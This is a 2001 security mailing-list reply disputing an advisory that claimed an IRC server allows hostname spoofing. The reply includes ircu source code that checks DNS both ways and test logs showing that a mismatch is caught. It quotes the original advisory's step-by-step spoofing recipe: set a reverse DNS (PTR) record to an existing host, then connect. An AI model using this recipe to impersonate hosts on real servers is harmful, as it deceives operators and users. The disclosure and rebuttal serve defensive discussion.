Re: OpenProjects IRCD allows DNS spoofing

["Matthew S. Hallacy" <poptix () techmonkeys org>]

This is incorrect, ircu has had hostname checking for a very
long time, as well as hybrid. While it's completely possible
that the nameserver used by this server had its cache poisoned, or
that a different bug was found, but I can assure you that it is not
as simple as setting a PTR entry and connecting.

Snippet from s_bsd.c in ircu2.10.05:

  /*
   * Verify that the host to ip mapping is correct both ways and that
   * the ip#(s) for the socket is listed for the host.
   */
  if (hp)
  {
    for (i = 0; hp->h_addr_list[i]; i++)
      if (!memcmp(hp->h_addr_list[i], &cptr->ip, sizeof(struct in_addr)))
        break;
    if (!hp->h_addr_list[i])
    {
      sendto_op_mask(SNO_IPMISMATCH, "IP# Mismatch: %s != %s[%08x]",
          inetntoa(cptr->ip), hp->h_name, *((unsigned int *)hp->h_addr));
      hp = NULL;
    }
  }   


Perhaps the person showing this to you was nice enough to poison a
nameserver for you as well.

Further testing:


> /MODE poptrix +s 65535
ùíù 32767  : Server notice mask (0x7fff)
[test.net]  IP Mismatch 192.168.100.1 != babble.tc.umn.edu[89975ea0]
[test.net]  Client Connecting: poptix [~poptix@192.168.100.1) ]
> /WHOIS poptix
ÚÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄ---Ä--ÄÄ-ÄÄÄÄÄÄÄÄÄ--- --  -
| poptix (~poptix@192.168.100.1) (unknown)
³ ircname  : poptix
³ server   : test.net (ircu test server)
: idle     : 0 hours 4 mins 21 secs (signon: Sun Oct 14 08:22:31 2001)
> /VERSION
ùíù u2.10.05.18.(ipcheck4-5).: test.net M>0B6CeEHIKMStU

[irc@tranq ircd]$ host 192.168.100.1
1.100.168.192.in-addr.arpa. domain name pointer babble.tc.umn.edu.
[irc@tranq ircd]$ host babble.tc.umn.edu
babble.tc.umn.edu. has address 160.94.151.137


                        Matthew S. Hallacy

> * OpenProjects.NET IRCD DNS Spoofing *
>
> OpenProjects.net's ircd has some truly braindead code re DNS lookups
> and doesn't do a proper double-reverse paranoid lookup. In fact, it
> is possible to spoof any hostname that actually exists on the internet.
>
> Here is how to exploit it.
>
> 1. Choose a Hostname to Spoof.
> It is important to keep in mind that you must choose a hostname that
> actually exists, for our example, we will use 'gary7.nsa.gov'
>
> 2. Point Your Reverse Lookup To The Hostname.
> For our example, we will put the following in our BIND zonefile:
>       47.222.42.209.in-addr.arpa.     IN      PTR     gary7.nsa.gov.
>
> Where we will assume you are using the same IP I used, 209.42.222.47.
>
> 3. Connect To A Vulnerable IRC Server.
> BitchX -H 209.42.222.47 jmutex asimov.openprojects.net
>
> Try a WHOIS on yourself.
>
> /whois jmutex
> | jmutex (jmutex () gary7 nsa gov) (Government)
> ½ ircname  : Jukka Mutex
> ½ server   : asimov.openprojects.net (Fremont, CA)
> : idle     : 0 hours 0 mins 24 secs (signon: Tue Oct  9 05:32:16 2001)
>
> Credits: jmutex () newgold net, chrisj () newgold net, lilo
> Found by: Joseph Mallett
> Affects: OpenProjects u2.10.05.18.(ipcheck4-5)
> Rumored to Affect: Hybrid
>
> Copyright (c) 2001 Joseph Mallett. All rights reserved.

--